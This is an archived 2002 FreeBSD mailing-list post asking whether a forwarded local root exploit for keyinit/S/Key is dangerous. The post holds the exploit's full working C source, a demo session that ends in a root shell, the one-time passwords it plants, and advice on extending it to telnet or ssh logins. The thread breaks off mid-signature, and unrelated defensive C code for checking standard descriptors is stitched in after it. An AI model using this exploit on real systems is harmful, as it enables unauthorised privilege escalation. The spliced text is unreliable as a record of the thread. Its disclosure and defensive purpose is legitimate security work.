Date:      Thu, 25 Apr 2002 14:22:10 +0600
From:      "Vladimir G. Drobyshevsky" <vlad@telecom.ural.ru>
To:        freebsd-stable@freebsd.org, freebsd-current@freebsd.org
Subject:   FreeBSD security hole?
Message-ID:  <129604079.20020425142210@telecom.ural.ru>

Have a nice day!

  Yesterday I received that message from one of linux guys:

--- forward message ---

/*
phased/b10z
phased@snosoft.com <mailto:phased@snosoft.com>
23/04/2002

stdio kernel bug in all releases of FreeBSD up to and including 4.5-RELEASE
decided to make a trivial exploit to easily get root :)

> id
uid=1003(phased) gid=999(phased) groups=999(phased)
> ./iosmash
Adding phased:
<--- HIT CTRL-C ---> 
> su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes# 

this program makes the following skeys valid

95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO

<http://www.snosoft.com>
cheers Joost Pol
*/

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    /* fill the process's descriptor table with copies of stdout */
    while (dup(1) != -1)
        ;
    /* leave stderr (fd 2) closed before the exec */
    close(2);
    /* the single argument becomes keyinit's argv[0];
     * execl()'s argument list must be terminated with NULL */
    execl("/usr/bin/keyinit",
          "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",
          (char *)NULL);
    return 1;
}

--- forward message ---

He asked me to verify that information. I did. And it works.

And the second message that I received today:

--- message ---

phased had some comments he wanted me to forward on to the lists in
regards to his latest exploit.

He says that skeys are used via all authentication methods, i.e. telnet, so
someone could change the user to someone in the wheel group. Haven't used
skeys via ssh yet but I presume it works. Root obviously can't just telnet
in by default but usually can ssh, but if the box being exploited contains
people in the wheel group you can change the root user in the exploit to any
user to log in via skeys as that user.

--- message ---

I do not understand the internals of the system so well; I only see
that within 30 seconds I got access to the root account
(of course, from the account of a user who is in group wheel;
otherwise su, naturally, does not give access).

Therefore I ask to comment on these messages. How dangerous can it be?

--
 Sincerely yours,
   Vl
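The exploit above execs a setuid program with stderr closed, so the first file that program opens receives descriptor 2 and anything it writes to stderr ends up in that file. As an added example that is not part of this thread, the C code below shows the usual defence in the privileged program itself (function names are mine): check that descriptors 0 to 2 are open before opening anything else and attach /dev/null to any that are not. The demo reproduces the closed-stderr state and returns the descriptor a subsequent open() receives with and without the check.

```c
#include <fcntl.h>
#include <unistd.h>

/* Return 1 if fd is an open descriptor, 0 otherwise. */
int fd_is_open(int fd) {
    return fcntl(fd, F_GETFD) != -1;
}

/* Make sure descriptors 0, 1 and 2 are open, attaching /dev/null to any
 * that are not. Called before a privileged program opens anything else,
 * it stops a later open() from landing on a standard descriptor, where
 * stdio error output would then be written into that file.
 * Returns how many descriptors had to be filled, or -1 on failure. */
int sanitise_stdfd(void) {
    int filled = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fd_is_open(fd))
            continue;
        /* open() returns the lowest free descriptor; 0..fd-1 are known
         * to be open, so the result must be fd itself */
        int nullfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nullfd != fd)
            return -1;
        filled++;
    }
    return filled;
}

/* Constructed scenario: close stderr as the exploit does, optionally run
 * the check, then open a file and return the descriptor it received.
 * The original stderr is saved and restored so the process stays usable. */
int fd_after_closed_stderr(int sanitise) {
    if (sanitise_stdfd() < 0)          /* start from a known state: 0..2 open */
        return -1;
    int saved = dup(2);
    if (saved == -1)
        return -1;
    close(2);
    if (sanitise)
        sanitise_stdfd();
    int got = open("/dev/null", O_WRONLY);
    if (got > 2)
        close(got);
    dup2(saved, 2);                    /* restore stderr, replacing whatever took fd 2 */
    close(saved);
    return got;
}
```

Without the check the opened file takes descriptor 2; with it, the file lands at 3 or above and stderr stays pointed at /dev/null.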

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-stable" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?129604079.20020425142210>